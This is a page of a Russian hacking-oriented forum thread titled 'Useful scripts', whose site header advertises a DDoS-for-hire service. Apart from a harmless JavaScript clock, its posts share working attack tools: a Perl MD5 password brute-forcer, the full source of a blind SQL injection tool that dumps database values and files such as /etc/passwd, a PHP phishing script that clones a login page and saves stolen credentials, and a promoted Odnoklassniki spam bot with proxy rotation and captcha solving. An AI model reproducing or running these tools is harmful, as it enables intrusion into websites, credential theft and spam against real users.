Полезные скрипты [Perl],[PHP],[Python] - Страница 2 - Proxy-Base Community - Анонимность и безопасность в интернете.
Бесплатные прокси. Количество:
Прокси для пользователей форума (API). Количество:
Купить доступ к прокси-листам (API). Количество:
 



Информация по хайдам / репутации

(РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS
Бесплатные прокси уже в Telegram
Все инфопродукты и приватная информация бесплатно
Старый 20.08.2009, 21:36   #10 (permalink)
Proxy-Base.Org Team
 
Регистрация: 19.05.2009
Сообщений: 960
Member ID: 147

Репутация: 2374
Репутация: 2374
Сказал(а) спасибо: 894
Поблагодарили 2,054 раз(а) в 713 сообщениях
Топикстартер (автор темы) По умолчанию Re: Полезные скрипты [Perl],[PHP],[Python]

[JavaScript] - часы
PHP код:
<BODY onLoad="showTime()">
<
script language="JavaScript">
<!--
function 
showTime()
 {
  var 
timeNow = (new Date());
  var 
hours   timeNow.getHours();
  var 
minutes timeNow.getMinutes();
  var 
seconds timeNow.getSeconds();
  if ((
hours) <10) { hours " " hours; }
  if ((
minutes) < 10) { minutes "0" minutes; }
  if (
seconds 10) { seconds "0" seconds; }
  
thistime ""+hours ":" minutes ":" seconds;
  
//if (document.all)
   
bgclocknoshade.innerHTML thistimebgclockshade.innerHTML thistime; }
  
setTimeout("showTime()"500);
 }
//-->
</script>
<div id = "bgclockshade" style = "position:absolute; visibility:visible; font-family:Verdana; color:000000;
 FONT-WEIGHT: bold; font-size:20px; top:12px; right:6px"></div>
<div id = "bgclocknoshade" style = "position:absolute; visibility:visible; font-family:Verdana; color:808D33;
 FONT-WEIGHT: bold; font-size:20px; top:10px; right:4px"></div>
</BODY> 
пример для правого верхнего угла, редактируйте параметр right для нужного вам размещения.
hide вне форума   Ответить с цитированием
Старый 21.08.2009, 00:39   #11 (permalink)
VPN
 
Аватар для 2FED
 
Регистрация: 11.05.2009
Адрес: Сибирь
Сообщений: 458
Member ID: 4
ICQ 310234

Репутация: 855
Репутация: 855
Сказал(а) спасибо: 599
Поблагодарили 516 раз(а) в 199 сообщениях
По умолчанию Re: Полезные скрипты [Perl],[PHP],[Python]

Давайте не будем всякую ***ню выкладывать типо-генератор паролей,часы и тд.Полезное-значит это нужно)
2FED вне форума   Ответить с цитированием
Старый 21.08.2009, 00:49   #12 (permalink)
Proxy-Base.Org Team
 
Регистрация: 19.05.2009
Сообщений: 960
Member ID: 147

Репутация: 2374
Репутация: 2374
Сказал(а) спасибо: 894
Поблагодарили 2,054 раз(а) в 713 сообщениях
Топикстартер (автор темы) По умолчанию Re: Полезные скрипты [Perl],[PHP],[Python]

я буду ***ню выкладывать)
мне нужна)
2FED, коллега, специально для Вас не ***ня.

MD5 Bruteforce на Perl
Код:
#!/usr/bin/perl
# use strict; Sorry next time i'll use it ;)
# MD5 Hash Bruteforce Kit
# by Iman Karim (iman.karim@smail.inf.fh-bonn-rhein-sieg.de)
# URL : http://home.inf.fh-rhein-sieg.de/~ikarim2s/
# Date : 11.02.2007
# Info[0] : This Cracker is by far not the fastest! But it helped me alot to find "lost" passwords ;)
# Info[1] : Written under Kubuntu Linux (Throw away Windows!)
# Info[2] : If you can code a bit perl, you can modify it to crack sha etc too...
# Greets to: Invisible!
$ver = "01";
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.

if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";};
use Digest::MD5 qw(md5_hex);
use Time::HiRes qw(gettimeofday);

if ($ARGV[0]=~"a") {
 $alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($ARGV[0]=~"A") {
 $alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($ARGV[0]=~"d") {
 $alpha = $alpha."1234567890";}
if ($ARGV[0]=~"x") {
 $alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}

if ($alpha eq "" or $ARGV[3] eq "") {usage();};
if (length($ARGV[3]) != 32) { die "Sorry but it seems that the MD5 is not valid!\n";};

print "Selected charset for attack: '$alpha\'\n";
print "Going to Crack '$ARGV[3]'...\n";

for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){
 crack ($t);
}

sub usage{
 print "\n\nMD5 Hash Bruteforce Kit v_$ver\n";
 print "by Iman Karim (iman.karim\@smail.inf.fh-bonn-rhein-sieg.de)\n";
 print "http:\/\/home.inf.fh-rhein-sieg.de\/~ikarim2s\/\n\n";
 print "USAGE\n";
 print "./md5crack <charset> <mincount> <maxcount> <yourMD5>\n";
 print " Charset can be: [aAdx]\n";
 print " a = {'a','b','c',...}\n";
 print " A = {'A','B','C',...}\n";
 print " d = {'1','2','3',...}\n";
 print " x = {'!','\"',' ',...}\n";
 print "EXAMPLE FOR CRACKING A MD5 HASH\n";
 print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n";
 print " This example tries to crack the given MD5 with all lowercase Alphas and all digits.\n";
 print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n";
 print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n";
 print " This example tries to crack the given MD5 with all lowercase Alphas and all uppercase Alphas.\n";
 print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n";
 print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n";
 print " This example tries to crack the given MD5 with nearly every character.\n";
 print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n";
 die "Quitting...\n";
}

sub crack{
 $CharSet = shift;
 @RawString = ();
 for (my $i =0;$i<$CharSet;$i++){ $RawString[i] = 0;}
 $Start = gettimeofday();
 do{
  for (my $i =0;$i<$CharSet;$i++){
   if ($RawString[$i] > length($alpha)-1){
    if ($i==$CharSet-1){
    print "Bruteforcing done with $CharSet Chars. No Results.\n";
    $cnt=0;
    return false;
   }
   $RawString[$i+1]++;
   $RawString[$i]=0;
   }
  }
###################################################
   $ret = "";
   for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
   $hash = md5_hex($ret);
   $cnt++;
   $Stop = gettimeofday();
   if ($Stop-$Start>$dbgtmr){
    $cnt = int($cnt/$dbgtmr);
    print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
    $cnt=0;
    $Start = gettimeofday();
   }
            print "$ARGV[3] != $hash ($ret)\n";
   if ($ARGV[3] eq $hash){
    die "\n**** Password Cracked! => $ret\n";
   }
###################################################
  #checkhash($CharSet)."\n";

  $RawString[0]++;
 }while($RawString[$CharSet-1]<length($alpha));
}

sub checkhash{
 $CharSet = shift;
 $ret = "";
 for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
 $hash = md5_hex($ret);
 $cnt++;
 $Stop = gettimeofday();
 if ($Stop-$Start>$dbgtmr){
  $cnt = int($cnt/$dbgtmr);
  print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
  $cnt=0;
  $Start = gettimeofday();
 }

 if ($ARGV[3] eq $hash){
  die "\n**** Password Cracked! => $ret\n";
 }
 
}
Запускаем через cmd командой:
Код:
С:/Папка с брутом/md5_brute.pl aA 1 3 сам_хеш
где
  • aA - регистры букв для перебора, для цифр используем d, для символов x
  • 1 - мин. длинна
  • 3 - макс. длинна
hide вне форума   Ответить с цитированием
Старый 21.08.2009, 10:53   #13 (permalink)
VPN
 
Аватар для 2FED
 
Регистрация: 11.05.2009
Адрес: Сибирь
Сообщений: 458
Member ID: 4
ICQ 310234

Репутация: 855
Репутация: 855
Сказал(а) спасибо: 599
Поблагодарили 516 раз(а) в 199 сообщениях
По умолчанию Re: Полезные скрипты [Perl],[PHP],[Python]

Blind SQL Injection POC

PHP код:
#!/usr/bin/perl
# Blind SQL Injection POC. aramosf@514.es // http://www.514.es
#
# CHANGELOG:
# Tue Jul 13 10:14:19 RST 2006
# + threads support. for hungry hackers.
# Wed Jul 12 14:04:33 RST 2006
# + change sql teqneez mcdonalds powah 8) (more than 40% optimization)
#   please, rip me!!, make your own paper!! =]
# + support for windows files (for example: C:\\boot.ini)
# + support for " and 1="1 sql injection
# + -binary and -ascii support
# - -charset option removed
# - -dict option removed
# + upgrade to v1.2
# Sat Apr  1 03:13:01 CEST 2006
# + -get now support resume (with -start option)
# Thu Mar 30 02:06:41 CEST 2006
# -get to fetch files (thank you ilo AGAIN)
# ***** RELIABLE SPEED IMPROVEMENT USING SOME SKILLS OF SQL AND BRAIN!!***
# Sat Mar 25 13:57:39 CET 2006
# Release `haqerz edition` of bsqlbf:
# + -time option added (IDS bypass)
# + -rtime option added (IDS bypass)
# + -rproxy option added (IDS bypass)
# + -ruagent option added (IDS bypass)
# Sun Dec 11 11:01:34 CET 2005
# + fixed automatch in POSTs
# + better output
# Mon Dec  5 18:30:03 CET 2005
# + added -blind option (to specify which attribute have sql injection).
# Tue Nov 29 17:31:54 CET 2005
# + auto search match string (when they arent -match option)
# Mon Nov 28 16:34:09 CET 2005
# + Support for POST and GET methods (-method get // -method post).
# + Cookies support (-cookie "blah=foo; moo=doo").
# + UserAgent support (-uagent "SQL Blind tool").
# Wed Nov 23 23:44:23 RST 2005
# First version 0.1:
# + code ripped from www.reversing.org <ilo[at]reversing.org> (thanks!)
#
#
# TODO:
# [ ] Rip more code from others.

use LWP::UserAgent;
use 
Getopt::Long;
use 
IO::Handle;
use 
strict;
use 
threads;
use 
threads::shared;
use 
Time::HiRes qwusleep);

$| = 
1;


###############################################################################
my $default_debug 0;
my $default_length 32;
my $default_method "GET";
my $default_time 0;
my $version "1.2";
my $default_useragent "bsqlbf $version";
my $default_sql "version()";
###############################################################################


$| = 1;

my ($args$solution);
my (%vars, @varsb);
my ($lastvar$lastval);
my ($scheme$authority$path$query$fragment);
my ($head$tail$high);
my $hits 0
my $amatch 0;
my ($ua,$req);
my $furl;

###############################################################################
# Define GetOpt:
my ($url$sql$time$rtime$match$uagent$debug);
my ($proxy$proxy_user$proxy_pass,$rproxy$ruagent); 
my ($start$length$method$cookie$blind);
my ($help$get);
my ($ascii$binary);

my $options GetOptions (
  
'help!'            => \$help
  
'url=s'            => \$url,
  
'get=s'            => \$get,
  
'sql=s'            => \$sql,
  
'blind=s'          => \$blind,
  
'match=s'          => \$match,
  
'start=s'          => \$start,
  
'length=s'         => \$length,
  
'method=s'         => \$method,
  
'uagent=s'         => \$uagent,
  
'ruagent=s'         => \$ruagent,
  
'cookie=s'         => \$cookie,
  
'proxy=s'          => \$proxy,
  
'proxy_user=s'     => \$proxy_user,
  
'proxy_pass=s'     => \$proxy_pass,
  
'rproxy=s'         => \$rproxy,
  
'debug!'           => \$debug
  
'binary!'           =>\$binary
  
'ascii!'           => \$ascii
  
'rtime=s'          => \$rtime
  
'time=i'           => \$time );

&
help unless ($url);
&
help if $help eq 1;

#########################################################################
# Default Options.
$uagent         ||= $default_useragent
$debug          ||= $default_debug
$length         ||= $default_length
$solution       ||= $start;
$method         ||= $default_method;
$sql            ||= $default_sql;
$time           ||= $default_time;


&
createlwp();
&
parseurl();

if ( ! 
defined($blind)) {
        
$lastvar $varsb[$#varsb];
        
$lastval $vars{$lastvar};
} else {
        
$lastvar $blind;
        
$lastval $vars{$blind};
}

if (
defined($cookie)) { &cookie() }

if (!
$match) {
    print 
"\nTrying to find a match string...\n" if $debug == 1;
    
$amatch "1";
    
$match fmatch("$url"," AND 1=");
    if (
$match eq "no vulnerable") { 
        print 
"\nNo vuln: 2nd..\n" if $debug ==1;
        
$match fmatch("$url","\" AND 1=\"");
        
$head "\"";
        
$tail " AND 1=\"1";
    };
    if (
$match eq "no vulnerable") { 
        print 
"Not vulnerable or use -blind\n";
        exit 
0
    } 
}

&
banner();
&
httpintro();


 
( ! 
$get) ? sqlget() : fileget();

my @byte = ();
my $wait_me;

sub getbyte {
   
my $sql $_[0];
   
my $bit="";
   
my @thread_count = ();
   
my $c 8;
   
my $i 0;
   
$high 128 unless $ascii;#) ? 128 : { 64; $byte[0] = 0; };
   
$wait_me 0

   
share($wait_me);
   
share (@byte);

   if (
$ascii) {
     
$byte[0] = 0
     
$high 64;
   }
   for (
$bit=1;$bit<=$high;$bit*=2) {
# launch thread ->
    
$thread_count[$i] = threads->create(\&launch_thread ,$sql$bit$c);
    
$thread_count[$i]->detach;
    
$c--;
   }

   while (
$wait_me <= 7) {
    
usleep(50);
    
#sleep(1);# if !$dontsleep;
   
}

   
my $str join("",@byte);
   
#print "\nSTR: $str\n";
   
return pack("B*","$str");

}

sub launch_thread {
    
my ($sql$bit$c) = @_;
        
my $val "$head and (ord($sql) %26 $bit)=0 $tail";
        
#print "VAL[$c] $val\n";
        
if (lc($methodeq "post") {
                
$vars{$lastvar} = $lastval $val;
        }
        
$furl $url;
        
$furl =~ s/($lastvar=$lastval)/$1$val/;
        &
createlwp if $rproxy || $ruagent;
        
my $html=fetch("$furl");
        
$hits++;
        foreach (
split(/\n/,$html)) {
        
lock @byte;
                if (/\
Q$match\E/) {
                    
$byte[$c]=0;
                    
last;
                 } else { 
$byte[$c] = 1; }
        }
    
lock $wait_me;
    
threads->yield();
    
$wait_me++;
}

sub sqlget {
    
my ($fsize,$i,$s);
        
$s "mid(length(length($sql)),1,1)";
    
my $lng .= getbyte($s);
    for (
$i=1;$i<=$lng;$i++) {
        
$s "mid(length($sql),$i,1)";
        
$fsize.=getbyte($s);
    }
    
    
#print "FSIZE: $fsize\n";
    
$length $fsize"bytes";
    &
bsqlintro();

    
my $rsize $start 1;
    for (
$i=$rsize;$i<=$fsize+1;$i++) {
        
$s "mid($sql,$i,1)";
        
#print "S: $s\n";
        
my $byte getbyte($s);
        
$solution .= $byte;
        print 
$byte;
     }
}

sub fileget {
    
my ($lget,$fstr);
    if (
$get =~ m/.*\/(.*)/) {
        
$lget = $1; }
        
$fstr "0x".unpack("H*","$get");
    if (
$get =~ m/.*\\(.*)/) {
        
$lget = $1;
        
$fstr "\"$get\"";
    }

    
my $rsize $start 1;
    if (-
"$lget&& ! $start) { 
        
$rsize = -"$lget";
        print 
"Error: file ./$lget exists.\n"
        print 
"You can erase or resume it with: -start $rsize\n";
        exit 
1
    
}
    
my ($i,$fsize);
    
$sql "mid(length(length(load_file($fstr))),1,1)";
    
my $lng .= getbyte($sql);
    for (
$i=1;$i<=$lng;$i++) {
        
my $find 0;
        
$sql "mid(length(load_file($fstr)),$i,1)";
        
$fsize.=getbyte($sql);
    }

    if (
$fsize "1") { print "Error: file not found, no permissions or ... who knows\n"; exit }
    
$length $fsize"bytes";
    
# starting ..
    
$sql "load_file($get)";

    &
bsqlintro();
    
# Get file
    #print "---> $lget";
    
open FILE">>$lget";
    
FILE->autoflush(1);
    print 
"\n--- BEGIN ---\n";
    
my ($i,$b,$fcontent);
    
$rsize if $rsize 1;
    for (
$i=$rsize;$i<=$fsize+1;$i++) {
        
my $find 0;
        
my ($furl$b_start$b_end$z);
        
$sql "mid(load_file($fstr),$i,1)";
        
$fcontent=getbyte($sql);
        print 
$fcontent;
        print 
FILE "$fcontent";
     }
    print 
"\n--- END ---\n";
        
close FILE;
    
$solution "success";
    
$sql "$get";
}



&
result();

#########################################################################
sub httpintro {
    
my ($strcookie$strproxy$struagent$strtime$i);
    print 
"--[ http options ]"; print "-"x62; print "\n";
    
printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
    if (
$ruagent) { $struagent="rnd.file:$ruagent} else { $struagent $uagent }
    
printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
    
printf ("%12s %-50s\n","path:"$path);
    foreach (
keys %vars) {
        
$i++;
        
printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
    }
    if (! 
$cookie) { $strcookie="(null)" } else { $strcookie $cookie; }
    
printf ("%12s %-50s\n","cookies:",$strcookie);
    if (! 
$proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy $proxy; }
    if (
$rproxy) { $strproxy "rnd.file:$rproxy}
    
printf ("%12s %-50s\n","proxy_host:",$strproxy);
    if (! 
$proxy_user) { $strproxy="(null)" } else { $strproxy $proxy_user; }
     
# timing
    
if (! $time && !$rtime) { $strtime="0sec (default)" 
    if ( 
$time == 0) { $strtime="0 sec (default)" 
    if ( 
$time == 1) { $strtime="15 secs" 
    if ( 
$time == 2) { $strtime="5 mins" 
    if (
$rtime) { $strtime "rnd.time:$rtime}
    
printf ("%12s %-50s\n","time:",$strtime);
}

sub bsqlintro {
    
my ($strstart$strblind$strlen$strmatch$strsql);
    print 
"\n--[ blind sql injection options ]"; print "-"x47; print "\n";
    if (! 
$start) { $strstart "(null)"; } else { $strstart $start; }
    if (! 
$blind) { $strblind "(last) $lastvar"; } else { $strblind $blind; }
    
printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
    if (
$length eq $default_length) { $strlen "$length (default)" } else { $strlen $length; }
    if (
$sql eq $default_sql) { $strsql "$sql (default)"; } else { $strsql $sql; }
    
printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
    if (
$amatch eq 1) { $strmatch "auto match:" } else { $strmatch "match:"; }
    
#printf ("%12s %-60s\n","$strmatch",$match);
    
print $strmatch $match\n";
    print 
"-"x80; print "\n\n";
}

#########################################################################

sub createlwp {
    
my $proxyc;
    &
getproxy;
    &
getuagent if $ruagent;
    
LWP::Debug::level('+') if $debug gt 3;
    
$ua = new LWP::UserAgent(
        
cookie_jar=> { file => "$$.cookie" }); 
    
$ua->agent("$uagent");
    if (
defined($proxy_user) && defined($proxy_pass)) {
        
my ($pscheme$pauthority$ppath$pquery$pfragment) =
        
$proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|; 
        
$proxyc $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
    } else { 
$proxyc $proxy; }
    
    
$ua->proxy(['http'] => $proxyc) if $proxy;
    
undef $proxy if $rproxy;
    
undef $uagent if $ruagent;
}    

sub cookie {
    
# Cookies check
    
if ($cookie || $cookie =~ /; /) {
        foreach 
my $c (split /;/, $cookie) {
            
my ($a,$b) = split /=/, $c;
            if ( ! 
$a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
        }
    }
}

sub parseurl {
 
###############################################################################
 # Official Regexp to parse URI. Thank you somebody.
    
($scheme$authority$path$query$fragment) =
        
$url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|; 
    # Parse args of URI into %vars and @varsb.
    
foreach my $varval (split /&/, $query) {
        
my ($var$val) = split /=/, $varval;
        
$vars{$var} = $val;
        
push(@varsb$var);
    }
}


#########################################################################
# Show options at running:
sub banner {
    print 
"\n // Blind SQL injection brute force.\n";
    print 
" // aramosf\@514.es / http://www.514.es\n\n";
}


#########################################################################
# Get differences in HTML
sub fmatch {
 
my ($ok,$rtrn);
 
my ($furla$furlb,$quote) = ($_[0], $_[0],$_[1]);
 
my ($html_a$html_b);
 if (
lc($methodeq "get") {
    
$furla =~ s/($lastvar=$lastval)/$${quote}1/;
    
$furlb =~ s/($lastvar=$lastval)/$${quote}0/;
     
$html_a fetch("$furla");
    
$html_b fetch("$furlb");
 } 
elsif (lc($methodeq "post") {
   
$vars{$lastvar} = $lastval ${quote}1";
   
$html_a fetch("$furla");
   
$vars{$lastvar} = $lastval ${quote}0";
   
$html_b fetch("$furla");
   
$vars{$lastvar} = $lastval;
 }


 
#print "$html_a";
 #print "$html_b";

 
if ($html_a eq $html_b) {
  
$rtrn "no vulnerable";
  return 
$rtrn;
 }


 
my @h_a split(/\n/,$html_a);
 
my @h_b split(/\n/,$html_b);
 foreach 
my $a (@h_a) {
    
$ok 0;
    if (
$a =~ /\w/) {
           foreach (@
h_b) {
            if (
$a eq $_) {$ok 1; }
        }
    } else { 
$ok 1; }
   
$rtrn $a;
   
last if $ok ne 1;
 }
 return 
$rtrn;
}


#########################################################################
# Fetch HTML from WWW
sub fetch {
    print 
"fetch: $_[0]\n";
    
my $secs;
    if (
$time == 0) { $secs }
    
elsif ($time == 1) { $secs 15 }
    
elsif ($time == 2) { $secs 300 }
    if (
$rtime =~ /\d*-\d*/ && $time == 0) {
        
my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
        
srand$secs int(rand($p-$l+1))+$l;
    } 
elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
        print 
"You can't run with -time and -rtime. See -help.\n";
        exit 
1;
    }
    
sleep $secs;
    
    
my $res;
    if (
lc($methodeq "get") {
        
my $fetch $_[0];
        if (
$cookie) {
            
$res $ua->get("$fetch"Cookie => "$cookie");
        } 
elsif (!$cookie) {
            
$res $ua->get("$fetch");
        }
    } 
elsif (lc($methodeq "post") {
        
my($s$a$p$q$f) =
          
$url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|; 
        
my $fetch "$s://$a".$p;
        if (
$cookie) {
            
$res $ua->post("$fetch",\%varsCookie => "$cookie");
        } 
elsif (!$cookie) {
            
$res $ua->post("$fetch",\%vars);
        }
    } else {
        die 
"Wrong httpd method. Use -h for help\n";
    }
    
my $html $res->content();
    return 
$html;
}


sub getproxy {
    if (
$rproxy && $proxy !~ /http/) {
        
my @lproxy;
        
open PROXY$rproxy or die "Can't open file: $rproxy\n";
        while(<
PROXY>) { push(@lproxy,$_) if ! /^#/ }
        
close PROXY;
        
srandmy $ind rand @lproxy;
        
$proxy $lproxy[$ind];
    } 
elsif ($rproxy && $proxy =~ /http/)  {
        print 
"You can't run with -proxy and -rproxy. See -help.\n";
        exit 
1;
    }
}

sub getuagent {
        
my @uproxy;
        
open UAGENT$ruagent or die "Can't open file: $ruagent\n";
        while(<
UAGENT>) { push(@uproxy,$_) if ! /^#/ }
        
close UAGENT;
        
srandmy $ind rand @uproxy;
        
$uagent $uproxy[$ind];
        
chop($uagent);
}

sub result {
    print 
"\r results:                                  \n" .
     
$sql = $solution\n" if length($solution) > 0
    print 
" total hits: $hits\n";
}


sub help {
    &
banner();
    print 
" usage: $0 <-url http://www.host.com/path/script.php?foo=bar> [options]\n";
    print 
"\n options:\n";
    print 
" -sql:\t\tvalid SQL syntax to get; connection_id(), database(),\n";
    print 
"\t\tsystem_user(), session_user(), current_user(), last_insert_id(),\n"
    print 
"\t\tuser() or all data available in the requested query, for\n";
    print 
"\t\texample: user.password. Default: version()\n";
    print 
" -blind:\tparameter to inject sql. Default is last value of url\n";
    print 
" -match:\tstring to match in valid query, Default is try to get auto\n";
    print 
" -start:\tif you know the beginning of the string, use it.\n";
    print 
" -length:\tmaximum length of value. Default is $default_length.\n";
    print 
" -time:\t\ttimer options:\n";
    print 
" \t0:\tdont wait. Default option.\n";
    print 
" \t1:\twait 15 seconds\n";
    print 
" \t2:\twait 5 minutes\n";
    print 
" -rtime:\twait random seconds, for example: \"10-20\".\n";
    print 
" -method:\thttp method to use; get or post. Default is $default_method.\n";
    print 
" -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
    print 
" -ruagent:\tfile with random http UserAgent header to use.\n";
    print 
" -cookie:\thttp cookie header to use\n";
    print 
" -rproxy:\tuse random http proxy from file list.\n";
    print 
" -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
    print 
" -proxy_user:\tproxy http user\n";
    print 
" -proxy_pass:\tproxy http password\n";
    print 
"\n examples:\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \"user()\"\n";
    print 
" bash# $0 -url http://www.buggy.com/bug.php?r=514&p=3 -get \"/etc/passwd\"\n";
    exit(
1);

2FED вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
Старый 02.09.2009, 17:13   #14 (permalink)
жърный пiся
 
Регистрация: 06.07.2009
Сообщений: 21
Member ID: 1059

Репутация: 76
Репутация: 76
Сказал(а) спасибо: 27
Поблагодарили 52 раз(а) в 32 сообщениях
По умолчанию Re: Полезные скрипты [Perl],[PHP],[Python]

скрипт создания фейков
Код:
<?php  
//Правим то что ниже  
$site="http://mail.ru/"; //Адрес сайта, фейк которого нужно сделать  (http:// и закрывающий слеш обязателен!)  
$upsite="http://mail.ru/";//Куда перекинуть юзера после ввода пароля  
$yoursite="http://Адрес этого скрипта/index.php"; //Адрес фейка  
$nformat=2;//Номер формата  (1) $p1 @ $p2 ; $p3 (2) $p1 *перенос строки* $p2 *перенос строки* $p3  (3) $p1 ; $p2  
$p1="Login"; //Имена полей которые ловим POST'ом (берите их из ХТМЛ кода сайта. пример: <input type="text" class="long" size="10" name="Login" tabindex="1" value="asdfsad" />   Вот name="Login" и есть то самое поле. Вписываем Login  
$p2="Domain";  
$p3="Password";  
$files="info.txt"; //Файл куда записывать пароли. Необходимы права 666  
//Дальше ничего править не нужно  
$p1=$_POST[$p1];  
$p2=$_POST[$p2];  
$p3=$_POST[$p3];  
$site = str_replace('https://','http://' ,$site); $rid="193";  
if (strtoupper(substr(PHP_OS,0,3)) === 'WIN') { $correct_return = "\r\n"; } else { $correct_return = "\n"; }  
$format[1]=$p1."@".$p2.";".$p3.$correct_return;  
$format[2]=$p1.$correct_return.$p2.$correct_return.$p3.$correct_return;  
$format[3]=$p1.";".$p2.$correct_return;  
function fvf($site,$yoursite,$rid) {  
         $contents=file_get_contents ( $site );  
         $sd=0;  
         $sd1="";  
         while ($sd1 != "/") { $sd=$sd-1; $sd1=substr($site, $sd, 1); }  
        $sd=$sd+1;  
        if ($sd != "") { $site=substr($site,0,$sd); }  
        $contents = str_replace('onsubmit=','onsubmit=""' ,$contents);  
        $contents = str_replace('url(', 'url('.$site ,$contents);  
        $contents = str_replace('url('.$site.'"', 'url("'.$site ,$contents);  
        $contents = str_replace("url(".$site."'", "url('".$site ,$contents);  
        $contents = str_replace('get', 'post' ,$contents);  
        $contents = str_replace('Get', 'post' ,$contents);  
        $contents = str_replace('GET', 'post' ,$contents);  
        $contents = str_replace('<form','<form action="'.$yoursite.'?'.$rid.'='.$rid.'&site='.$site.'" ',$contents);  
        $contents = str_replace("HREF","href" ,$contents);  
        $contents = str_replace("SRC","src" ,$contents);  
        $contents = str_replace("BACKGROUND","background" ,$contents);  
        $contents = str_replace('href="','href="'.$site ,$contents);  
        $contents = str_replace('href ="','href ="'.$site ,$contents);  
        $contents = str_replace("href='","href='".$site ,$contents);  
        $contents = str_replace('href=/','href ='.$site ,$contents);  
        $contents = str_replace('src="','src="'.$site ,$contents);  
        $contents = str_replace("src='","src='".$site ,$contents);  
        $contents = str_replace("src=i","src=".$site."i" ,$contents);  
        $contents = str_replace('background="','background="'.$site ,$contents);  
        $contents = str_replace('background ="','background ="'.$site ,$contents);  
        $contents = str_replace("background='","background='".$site ,$contents);  
        $contents = str_replace("background=i","background=".$site."i" ,$contents);  
        $contents = str_replace($site.$site,$site,$contents);  
        $contents = str_replace($site."/", $site ,$contents);  
        $contents = str_replace('"m', '" m' ,$contents);  
        $contents = str_replace('="'.$site.'http', '="http',$contents);  
        echo $contents;  
}  
if ($_GET[$rid] != "")  
{  
        $file = fopen ($files,"a+");  
        if ( !$file ) { echo("Ошибка открытия файла"); } else { fputs ( $file, $format[$nformat].$correct_return); } fclose ($file);  
        if ($upsite != "") {echo "<meta http-equiv='REFRESH' CONTENT='0;URL=".$upsite."'>";  exit;};  
        fvf($nosite,$yoursite,$rid);  
        exit;  
}  
fvf($site,$yoursite,$rid);  
?>
shnurd вне форума   Ответить с цитированием
4 пользователя(ей) сказали cпасибо:
Старый 02.09.2009, 23:23   #15 (permalink)
Заблокирован
 
Регистрация: 06.06.2009
Адрес: ip: 178.65.158.19, 95.52.11.251, 95.54.190.39, 78.36.31.7
Сообщений: 97
Member ID: 511
ICQ 448354

Репутация: 200
Репутация: 200
Сказал(а) спасибо: 155
Поблагодарили 180 раз(а) в 69 сообщениях
По умолчанию Re: Полезные скрипты [Perl],[PHP],[Python]


Скрипт позволяет делать несколько копий файлов(зеркализации) на несколько сайтов. (13!!! Файлообменников. multi-up.com отдыхает)
Вы загружаете файл на сайт составленый их этого скрипта, и автоматом он грузиться на несколько, указанных вами обмеников.
Всё делаеться автоматом, так что не надо следить за всем процессом.

Ссылки:
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 5 очко(ов) репутации(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.
aston вне форума   Ответить с цитированием
Старый 08.03.2010, 22:05   #16 (permalink)
NTR
VPN
 
Аватар для NTR
 
Регистрация: 30.05.2009
Адрес: proxy-base.org
Сообщений: 1,516
Member ID: 383

Репутация: 3739
Репутация: 3739
Сказал(а) спасибо: 1,168
Поблагодарили 2,548 раз(а) в 1,149 сообщениях
Хорошо Re: Полезные скрипты [Perl],[PHP],[Python]

Yet Another Odnoklassniki Sender
автор: Kaimi
сайт автора: kaimi.ru

Скрипт для рассылки по социальной сети Одноклассники. (perl)

[+]Многопоточность
[+]Рассылка по друзьям, друзьям друзей, случайным онлайн пользователям
[+]Ротация сообщений/ссылок
[+]Поддержка макросов (<<name>>, <<link>>, <<digit>>, <<trash>>, <<smile>>)
[+]Рандомизация текста (замена букв, замена имен)
[+]Поддержка прокси socks5/http
[+]Поддержка антикапчи

Настройка скрипта производится в файле config.cfg.

Скачать

Последний раз редактировалось NTR; 14.03.2010 в 15:44.
NTR вне форума   Ответить с цитированием
Старый 09.03.2010, 22:26   #17 (permalink)
NTR
VPN
 
Аватар для NTR
 
Регистрация: 30.05.2009
Адрес: proxy-base.org
Сообщений: 1,516
Member ID: 383

Репутация: 3739
Репутация: 3739
Сказал(а) спасибо: 1,168
Поблагодарили 2,548 раз(а) в 1,149 сообщениях
Сообщение Re: Полезные скрипты [Perl],[PHP],[Python]

